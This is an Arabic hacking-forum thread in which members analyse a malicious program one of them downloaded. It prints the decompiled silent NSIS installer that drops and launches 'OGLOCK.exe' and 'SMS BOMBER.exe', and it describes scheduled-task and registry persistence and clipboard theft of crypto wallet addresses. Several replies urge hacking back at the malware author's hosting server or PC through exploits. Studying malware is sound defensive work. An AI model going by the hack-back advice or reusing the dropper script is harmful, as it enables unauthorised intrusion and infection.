[ نقاش ] الانتقام من ملغم


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

الحالة
مغلق و غير مفتوح للمزيد من الردود.

justmebro07

:: عضو جديد ::
12 نوفمبر 2018
36
51
0
السلام عليكم ورحمة الله و بركاته


قبل مدة حملت برنامج وبعد تحليله اكتشفت انه ملغم وطلعلي هذا الحساب

المحتوى المخفي متاح للمستخدمين المسجلين!

هل من طريقة لاكتشاف اسم المستخدم و الباس​
 
  • أعجبني
التفاعلات: Capony و NYAN CAT

trojan313

مشارك
31 أغسطس 2019
87
91
0
نعم توجد طريقة وهي اختراق موقع ان لقيت فيه ثغرات تستطيع اختراقه ما قدرت افحص سيرفر الا ما تلاقي ثغرة في احد مواقع على سيرفر ان كان سيرفر خاص بالامكان ان تبحث عن خدمات وبورتات المفتوحة على سيرفر ان كان يوجد ثغرات تستطيع الوصول الى هدفك هناك كثير من طرق الوصول الى هدف
 

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
464
1,173
Kuwait
github.com
0
السلام عليكم

يمكنك استهداف البرنامج الخبيث الذي استخدمه. أو يمكنك استهداف حاسوبه عن طريق ثغرات الريموت خصوصاً لو كان يستخدم نظام قديم وغير محدث ويفضل استخدام Kali.
 
  • أعجبني
التفاعلات: ๖ۣۜA M E E R و Capony

trojan313

مشارك
31 أغسطس 2019
87
91
0
السلام عليكم

يمكنك استهداف البرنامج الخبيث الذي استخدمه. أو يمكنك استهداف حاسوبه عن طريق ثغرات الريموت خصوصاً لو كان يستخدم نظام قديم وغير محدث ويفضل استخدام Kali.
فكرة استهداف برنامج تعتمد على ثغرات buffer overflow فكرة جيدة وقوية ومضمونة اما استهداف حاسوبه شخصي لا اعتقد تجدي نفعاَ خصوصا انه مستخدم سيرفر خارجي الاستهداف يعني ما راح يقدر يستهدف جهازه الشخصي بدون حصول الى الاي بي جهازه الشخصي وبدون ايجاد ثغرات remote كما تعلم هذا نوع من ثغرات اصبح قليل جدا وبرافيت ومن نادر يتم طرح ثغرات من هذا نوع الافضل هو عمل بطريقتك اولى وهي ايجاد ثغرة في برنامج وبتالي يستطيع اختراقه او اختراق موقع او سيرفر في نهاية كل طرق تؤدي الى وصول الى هدف
 

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
464
1,173
Kuwait
github.com
0
فكرة استهداف برنامج تعتمد على ثغرات buffer overflow فكرة جيدة وقوية ومضمونة اما استهداف حاسوبه شخصي لا اعتقد تجدي نفعاَ خصوصا انه مستخدم سيرفر خارجي الاستهداف يعني ما راح يقدر يستهدف جهازه الشخصي بدون حصول الى الاي بي جهازه الشخصي وبدون ايجاد ثغرات remote كما تعلم هذا نوع من ثغرات اصبح قليل جدا وبرافيت ومن نادر يتم طرح ثغرات من هذا نوع الافضل هو عمل بطريقتك اولى وهي ايجاد ثغرة في برنامج وبتالي يستطيع اختراقه او اختراق موقع او سيرفر في نهاية كل طرق تؤدي الى وصول الى هدف
كنت أظن أنه يستخدم الـ IP الخاص به ولكن يبدو بأنه يستخدم استضافة.
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
ياريت ترفق البرنامج اخي .اريد اشوف السورس الخاص به لو دوت نت او لو قدرت افكه ..ممكن يفيد بطلبك او بشي ثاني
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
التعديل الأخير:

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
الملف بعد فكه بيحوي الملفات التالية ..بالمرفقات
خلنا نتساعد نشوف سالفته

2197


الملف فكيته من خلال 7zip
معلومات التثبيت الصامت للملف ..

كود:
; NSIS script NSIS-3 BadCmd=11
; Install

SetCompressor /SOLID lzma
SetCompressorDictSize 8

; --------------------
; HEADER SIZE: 3149
; START HEADER SIZE: 300
; MAX STRING LENGTH: 1024
; STRING CHARS: 907

OutFile [NSIS].exe
!include WinMessages.nsh

SilentInstall silent


; --------------------
; LANG TABLES: 1
; LANG STRINGS: 39

Name MakeFile
BrandingText "Nullsoft Install System v3.0"

; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System v3.0"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 MakeFile
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_19 1033 "ExecShell: "
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_36 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_37 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Retry to try again, or$\r$\nCancel to stop the installation."
LangString LSTR_38 1033 Custom


InstType $(LSTR_38)    ;  Custom
; wininit = $WINDIR\wininit.ini


; --------------------
; SECTIONS: 1
; COMMANDS: 26

Function .onInit
FunctionEnd


Section ; Section_0
  ; AddSize 6871
  System::Call "shell32::SHGetSpecialFolderPath(i $HWNDPARENT, t .r1, i 0x1A, i0)i.r0"
    ; Call Initialize_____Plugins
    ; SetOverwrite off
    ; File $PLUGINSDIR\System.dll
    ; SetDetailsPrint lastused
    ; Push "shell32::SHGetSpecialFolderPath(i $HWNDPARENT, t .r1, i 0x1A, i0)i.r0"
    ; CallInstDLL $PLUGINSDIR\System.dll Call
  SetOutPath $1\1337\
  SetOverwrite on
  AllowSkipFiles off
  File OGLOCK.exe
  File "SMS BOMBER.exe"
  ExecShell open $1\1337\OGLOCK.exe    ; "open $1\1337\OGLOCK.exe"
  ExecShell open "$1\1337\SMS BOMBER.exe"    ; "open $1\1337\SMS BOMBER.exe"
SectionEnd


/*
Function Initialize_____Plugins
  SetDetailsPrint none
  StrCmp $PLUGINSDIR "" 0 label_22
  Push $0
  SetErrors
  GetTempFileName $0
  Delete $0
  CreateDirectory $0 ; !!!! Unknown Params:  $0 "" ProgramFilesDir   ; 295 0 1
  IfErrors label_23
  StrCpy $PLUGINSDIR $0
  Pop $0
label_22:
  Return

label_23:
  MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
  Quit
FunctionEnd
*/



; --------------------
; UNREFERENCED STRINGS:

/*
17 CommonFilesDir
32 "C:\Program Files"
49 $PROGRAMFILES
53 "$PROGRAMFILES\Common Files"
70 $COMMONFILES
*/
 

المرفقات

๖ۣۜA M E E R

.:: DeveloPer ::.
طاقم الإدارة
4 نوفمبر 2018
10,320
794
العراق
0
الملف بعد فكه بيحوي الملفات التالية ..بالمرفقات
خلنا نتساعد نشوف سالفته

مشاهدة المرفق 2197


الملف فكيته من خلال 7zip
معلومات التثبيت الصامت للملف ..

كود:
; NSIS script NSIS-3 BadCmd=11
; Install

SetCompressor /SOLID lzma
SetCompressorDictSize 8

; --------------------
; HEADER SIZE: 3149
; START HEADER SIZE: 300
; MAX STRING LENGTH: 1024
; STRING CHARS: 907

OutFile [NSIS].exe
!include WinMessages.nsh

SilentInstall silent


; --------------------
; LANG TABLES: 1
; LANG STRINGS: 39

Name MakeFile
BrandingText "Nullsoft Install System v3.0"

; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System v3.0"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 MakeFile
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_19 1033 "ExecShell: "
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_36 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_37 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Retry to try again, or$\r$\nCancel to stop the installation."
LangString LSTR_38 1033 Custom


InstType $(LSTR_38)    ;  Custom
; wininit = $WINDIR\wininit.ini


; --------------------
; SECTIONS: 1
; COMMANDS: 26

Function .onInit
FunctionEnd


Section ; Section_0
  ; AddSize 6871
  System::Call "shell32::SHGetSpecialFolderPath(i $HWNDPARENT, t .r1, i 0x1A, i0)i.r0"
    ; Call Initialize_____Plugins
    ; SetOverwrite off
    ; File $PLUGINSDIR\System.dll
    ; SetDetailsPrint lastused
    ; Push "shell32::SHGetSpecialFolderPath(i $HWNDPARENT, t .r1, i 0x1A, i0)i.r0"
    ; CallInstDLL $PLUGINSDIR\System.dll Call
  SetOutPath $1\1337\
  SetOverwrite on
  AllowSkipFiles off
  File OGLOCK.exe
  File "SMS BOMBER.exe"
  ExecShell open $1\1337\OGLOCK.exe    ; "open $1\1337\OGLOCK.exe"
  ExecShell open "$1\1337\SMS BOMBER.exe"    ; "open $1\1337\SMS BOMBER.exe"
SectionEnd


/*
Function Initialize_____Plugins
  SetDetailsPrint none
  StrCmp $PLUGINSDIR "" 0 label_22
  Push $0
  SetErrors
  GetTempFileName $0
  Delete $0
  CreateDirectory $0 ; !!!! Unknown Params:  $0 "" ProgramFilesDir   ; 295 0 1
  IfErrors label_23
  StrCpy $PLUGINSDIR $0
  Pop $0
label_22:
  Return

label_23:
  MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
  Quit
FunctionEnd
*/



; --------------------
; UNREFERENCED STRINGS:

/*
17 CommonFilesDir
32 "C:\Program Files"
49 $PROGRAMFILES
53 "$PROGRAMFILES\Common Files"
70 $COMMONFILES
*/
ExecShell open $1\1337\OGLOCK.exe

ممكن هذا ..
 
  • أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
كمان فيه سكربت تثبيت صامت جوا السكربت الاول ..
بيطلعو ملفات تنفيذية من ضمنها واحد دوت نت رح اشوفه والثاني اعتقد كمان دوت نت بس محمي بحماية انيجما ..

للتحميل من المرفقات
 

المرفقات

  • 1.4 MB المشاهدات: 0

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
ملف الدوت نت مع السورس تبعه فيه التلغيم عالاغلب..لنشوف


2201
 

المرفقات

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
خخخ قال انتي كيل اسم ميثود التثبيت بالتاسك شيدولر :15:
وكمان بيثبت بالريجيستري ..
بس انا البدي ياه كيف عميسجل بالاستضافة تعيته لان دام الملف اله صلاحية يسوي ويعمل بالاستضافة فنحنا كمان فينا ..


2202
 
  • واااااااااو
التفاعلات: Mr.Ali

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
لو بالامكان قسم لتحليل الفيروسات والتلغيمات
اخي الاقسام الزيادة مابدنا ياها مفكر ماجربت ماخليت قسم لشي الا وفتحته ..مااحد بيشارك لاتخليني افتحلها واحكي هه
مااحد بيعلم اخوانه يااخي ..مثلا اليوم الاخ بوسالم وصل لمرحلة كبيرة بفك تلغيمة لؤي ..طيب علمنا الاخ ابوسالم شي من اللي يعرفه ؟ لا
الكلام مش بس عليه لا على كل واحد مبدع بمجال او عنده علم ومابيعلم اخوانه .
وعشان مااغتابه هي رح اعمله منشن bosalem
 
  • أعجبني
التفاعلات: Mr.Ali

justmebro07

:: عضو جديد ::
12 نوفمبر 2018
36
51
0
اخي الاقسام الزيادة مابدنا ياها مفكر ماجربت ماخليت قسم لشي الا وفتحته ..مااحد بيشارك لاتخليني افتحلها واحكي هه
مااحد بيعلم اخوانه يااخي ..مثلا اليوم الاخ بوسالم وصل لمرحلة كبيرة بفك تلغيمة لؤي ..طيب علمنا الاخ ابوسالم شي من اللي يعرفه ؟ لا
الكلام مش بس عليه لا على كل واحد مبدع بمجال او عنده علم ومابيعلم اخوانه .
وعشان مااغتابه هي رح اعمله منشن bosalem

صراحة لو كنت محترف لكنت اعطيت اضافة للمنتدى
 
  • أعجبني
  • أحببته
التفاعلات: BasharBachir و Mr.Ali

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
حسب السورس مارح تشتغل التلغيمة بالوهمي وبيعمل تنصت على الكليبورد وبيسرق حسابات لعملات متل اللي بالصورة
بيتم تحويل قيم البيس هذه لبايت اراي ومن ثم بيجلب السترينج من البايت اراي..
او مثل فكرة نيان بيستبدل الادريس اللي بتنسخه لحتى ترسله باللي له ..
التثبيتات حكينا عنها فوق ..هدا اللي شفته ..صراحة مابحب سالفة كشف التلغيم او فك الحمايات .. بتروح وقت كثير ..وماعندي خبرة فيها
ياريت لو احد بيعرف يفك حماية انيجما يفك الملف الثاني تكرما ..


2203
 
  • واااااااااو
التفاعلات: Mr.Ali
الحالة
مغلق و غير مفتوح للمزيد من الردود.

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك